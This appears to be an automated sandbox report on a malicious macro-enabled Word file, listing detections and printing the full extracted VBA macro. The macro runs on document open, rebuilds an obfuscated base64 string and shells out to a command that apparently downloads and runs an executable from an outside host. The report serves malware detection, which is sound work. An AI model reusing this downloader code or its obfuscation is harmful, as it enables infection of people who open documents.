MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an OOXML document containing VBA macros, including a Document_Open macro and a critical heuristic for a potential Shell call. ClamAV signatures also identify it as malicious malware. The VBA script appears to be a base64 decoder and deobfuscator, likely preparing to execute a downloaded payload.
Heuristics 5
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell Ymqabka(Igaze), 0 End Sub -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() Dim Igaze As String -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8179 bytes |
SHA-256: d7864a783a2ead6f526749e82f994582eedfee9fec524011de4f2b30843f61a5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function Ymqabka(Ogwoqoqk As String) As String
Dim Uqusuw() As Byte, Icsirvu() As Byte, Uxak(255) As Byte, Axor(63) As Long, Yjlalfe(63) As Long
Dim Ycong(63) As Long, Ifyba As Long, Upaqojn As Integer, Erokfix As Long, Ilirif As Long, Ikogyb As String
Dim Ucut As Long
Ogwoqoqk = Replace(Ogwoqoqk, vbCr, vbNullString)
Ogwoqoqk = Replace(Ogwoqoqk, vbLf, vbNullString)
Ucut = Len(Ogwoqoqk) Mod 4
If Ucut Then Exit Function
If InStrRev(Ogwoqoqk, Chr$(61) & Chr$(61)) Then
Upaqojn = 2
ElseIf InStrRev(Ogwoqoqk, Chr$(61)) Then
Upaqojn = 1
End If
For Ucut = 0 To 255
Select Case Ucut
Case 65 To 90
Uxak(Ucut) = Ucut - 65
Case 97 To 122
Uxak(Ucut) = Ucut - 71
Case 48 To 57
Uxak(Ucut) = Ucut + 4
Case 43
Uxak(Ucut) = 62
Case 47
Uxak(Ucut) = 63
End Select
Next Ucut
For Ucut = 0 To 63
Axor(Ucut) = Ucut * 64
Yjlalfe(Ucut) = Ucut * 4096
Ycong(Ucut) = Ucut * 262144
Next Ucut
Icsirvu = StrConv(Ogwoqoqk, vbFromUnicode)
ReDim Uqusuw((((UBound(Icsirvu) + 1) \ 4) * 3) - 1)
For Erokfix = 0 To UBound(Icsirvu) Step 4
Ifyba = Ycong(Uxak(Icsirvu(Erokfix))) + Yjlalfe(Uxak(Icsirvu(Erokfix + 1))) + _
Axor(Uxak(Icsirvu(Erokfix + 2))) + Uxak(Icsirvu(Erokfix + 3))
Ucut = Ifyba And 16711680
Uqusuw(Ilirif) = Ucut \ 65536
Ucut = Ifyba And 65280
Uqusuw(Ilirif + 1) = Ucut \ 256
Uqusuw(Ilirif + 2) = Ifyba And 255
Ilirif = Ilirif + 3
Next Erokfix
Ikogyb = StrConv(Uqusuw, vbUnicode)
If Upaqojn Then Ikogyb = Left$(Ikogyb, Len(Ikogyb) - Upaqojn)
Ymqabka = Ikogyb
End Function
Public Function Olecho(Ymeg As String)
Olecho = Yveblyb(Ymeg)
End Function
Public Function Yveblyb(Utavopz As String)
Yveblyb = Utavopz
End Function
Function UqkygUqkedqe() As String
UqkygUqkedqe = Olecho("Y2") & Olecho("1k") & Olecho("Lm") & Olecho("V4")
End Function
Function OkyxluzrUresi() As String
OkyxluzrUresi = Olecho("Z") & Olecho("S") & Olecho("A") & Olecho("v") & Olecho("Y") & Olecho("y") & Olecho("A") & Olecho("i")
End Function
Function UdgufhenYkiqzitb() As String
UdgufhenYkiqzitb = Olecho("d2") & Olecho("Fp") & Olecho("dG") & Olecho("Zv")
End Function
Function AfzinEcyjab() As String
AfzinEcyjab = Olecho("c") & Olecho("i") & Olecho("A") & Olecho("v") & Olecho("d") & Olecho("C") & Olecho("A") & Olecho("x")
End Function
Function AhasakzEjoju() As String
AhasakzEjoju = Olecho("M") & Olecho("S") & Olecho("B") & Olecho("P") & Olecho("c") & Olecho("G") & Olecho("l") & Olecho("w")
End Function
Function UhpycyznUxnejxu() As String
UhpycyznUxnejxu = Olecho("I") & Olecho("C") & Olecho("Y") & Olecho("g") & Olecho("Y") & Olecho("m") & Olecho("l") & Olecho("0")
End Function
Function OsexuElapo() As String
OsexuElapo = Olecho("c") & Olecho("2") & Olecho("F") & Olecho("k") & Olecho("b") & Olecho("W") & Olecho("l") & Olecho("u")
End Function
Function EqamrUtyzpe() As String
EqamrUtyzpe = Olecho("IC") & Olecho("90") & Olecho("cm") & Olecho("Fu")
End Function
Function EgwefAluvij() As String
EgwefAluvij = Olecho("c2") & Olecho("Zl") & Olecho("ci") & Olecho("BP")
End Function
Function IdyphatEgozi() As String
IdyphatEgozi = Olecho("d2") & Olecho("5p") & Olecho("d3") & Olecho("Eg")
End Function
Function EmuliUlaryn() As String
EmuliUlaryn = Olecho("L2") & Olecho("Rv") & Olecho("d2") & Olecho("5s")
End Function
Function EdytYfot() As String
EdytYfot = Olecho("b") & Olecho("2") & Olecho("F") & Olecho("k") & Olecho("I") & Olecho("C") & Olecho("9") & Olecho("w")
End Function
Function IjvihiOlasl() As String
IjvihiOlasl = Olecho("cm") & Olecho("lv") & Olecho("cm") & Olecho("l0")
End Function
Function EjisuOdnulef() As String
EjisuOdnulef = Olecho("eS") & Olecho("Bu") & Olecho("b3") & Olecho("Jt")
End Function
Function AnymugtAwym() As String
AnymugtAwym = Olecho("YW") & Olecho("wg") & Olecho("aH") & Olecho("R0")
End Function
Function IzirquAlufufw() As String
IzirquAlufufw = Olecho("c") & Olecho("D") & Olecho("o") & Olecho("v") & Olecho("L") & Olecho("z") & Olecho("M") & Olecho("x")
End Function
Function UxihiUbijef() As String
UxihiUbijef = Olecho("L") & Olecho("j") & Olecho("E") & Olecho("4") & Olecho("N") & Olecho("C") & Olecho("4") & Olecho("y")
End Function
Function AkibdednAdvico() As String
AkibdednAdvico = Olecho("M") & Olecho("z") & Olecho("Q") & Olecho("u") & Olecho("M") & Olecho("T") & Olecho("k") & Olecho("4")
End Function
Function AzrixOdicyq() As String
AzrixOdicyq = Olecho("L") & Olecho("2") & Olecho("1") & Olecho("v") & Olecho("Z") & Olecho("G") & Olecho("U") & Olecho("v")
End Function
Function AzjufOcuq() As String
AzjufOcuq = Olecho("Y") & Olecho("2") & Olecho("l") & Olecho("m") & Olecho("c") & Olecho("m") & Olecho("F") & Olecho("k")
End Function
Function YxocEcafaq() As String
YxocEcafaq = Olecho("by") & Olecho("9s") & Olecho("ZW") & Olecho("Fz")
End Function
Function EnizazUsinguz() As String
EnizazUsinguz = Olecho("Z") & Olecho("S") & Olecho("9") & Olecho("k") & Olecho("e") & Olecho("W") & Olecho("5") & Olecho("h")
End Function
Function OqeqinInqusunl() As String
OqeqinInqusunl = Olecho("ZG") & Olecho("8u") & Olecho("ZX") & Olecho("hl")
End Function
Function AwbiriAsitop() As String
AwbiriAsitop = Olecho("IC") & Olecho("Vh") & Olecho("cH") & Olecho("Bk")
End Function
Function AhihilEsar() As String
AhihilEsar = Olecho("YX") & Olecho("Rh") & Olecho("JV") & Olecho("xJ")
End Function
Function OnvetEjgiwohg() As String
OnvetEjgiwohg = Olecho("Z") & Olecho("n") & Olecho("R") & Olecho("v") & Olecho("c") & Olecho("n") & Olecho("E") & Olecho("u")
End Function
Function AlhidvelIqev() As String
AlhidvelIqev = Olecho("Z") & Olecho("X") & Olecho("h") & Olecho("l") & Olecho("I") & Olecho("C") & Olecho("Z") & Olecho("z")
End Function
Function YpojguqfAkirys() As String
YpojguqfAkirys = Olecho("d") & Olecho("G") & Olecho("F") & Olecho("y") & Olecho("d") & Olecho("C") & Olecho("A") & Olecho("l")
End Function
Function YwqasyzIfdec() As String
YwqasyzIfdec = Olecho("YX") & Olecho("Bw") & Olecho("ZG") & Olecho("F0")
End Function
Function OgtujOkaczyp() As String
OgtujOkaczyp = Olecho("Y") & Olecho("S") & Olecho("V") & Olecho("c") & Olecho("S") & Olecho("W") & Olecho("Z") & Olecho("0")
End Function
Function OkmexveEfmuzyq() As String
OkmexveEfmuzyq = Olecho("b3") & Olecho("Jx") & Olecho("Lm") & Olecho("V4")
End Function
Function UpuhAvzocl() As String
UpuhAvzocl = Olecho("ZS") & Olecho("I=")
End Function
Sub Document_Open()
Dim Igaze As String
Igaze = Igaze & UqkygUqkedqe() & OkyxluzrUresi() & UdgufhenYkiqzitb() & AfzinEcyjab()
Igaze = Igaze & AhasakzEjoju() & UhpycyznUxnejxu() & OsexuElapo() & EqamrUtyzpe()
Igaze = Igaze & EgwefAluvij() & IdyphatEgozi() & EmuliUlaryn() & EdytYfot()
Igaze = Igaze & IjvihiOlasl() & EjisuOdnulef() & AnymugtAwym() & IzirquAlufufw()
Igaze = Igaze & UxihiUbijef() & AkibdednAdvico() & AzrixOdicyq() & AzjufOcuq()
Igaze = Igaze & YxocEcafaq() & EnizazUsinguz() & OqeqinInqusunl() & AwbiriAsitop()
Igaze = Igaze & AhihilEsar() & OnvetEjgiwohg() & AlhidvelIqev() & YpojguqfAkirys()
Igaze = Igaze & YwqasyzIfdec() & OgtujOkaczyp() & OkmexveEfmuzyq() & UpuhAvzocl()
Shell Ymqabka(Igaze), 0
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{B5B69946-3EE8-4164-81F6-910CCD046E0B}{70450978-A9DE-4920-9982-9AF9762BB85D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 31232 bytes |
SHA-256: eed7d3fca388e304f5fdb417ce12858963982755fcc84b3ad407a19806e7bc95 |
|||
|
Detection
ClamAV:
Doc.Malware.Chronos-6897935-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.